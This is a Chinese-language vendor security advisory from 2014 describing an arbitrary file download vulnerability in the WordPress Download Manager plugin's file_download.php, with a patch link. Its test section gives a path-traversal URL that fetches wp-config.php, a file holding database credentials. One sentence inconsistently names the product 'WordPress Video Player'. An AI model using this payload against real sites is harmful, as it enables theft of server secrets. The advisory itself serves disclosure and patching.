当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

WordPress Download Manager插件任意文件下载漏洞

     发表日期:2014-11-05 15:06:24

WordPress Download Manager插件\'file_download.php\' 任意文件下载漏洞

BugTraq-ID:70764

受影响系统:

WordPress Download Manager

详细信息:

 

WordPress Download Manager是文件和文档管理插件。

 

 

 

WordPress Video Player没有有效过滤\'file_download.php\'的值,在实现上存在安全漏洞,攻击者可利用此漏洞下载Web服务器的任意文件,获取敏感信息。

 

 

来源:

Hugo Santiago dos Santos

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php

解决办法:

厂商补丁:

 

WordPress

---------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

 

 

 

https://wordpress.org/plugins/download-manager/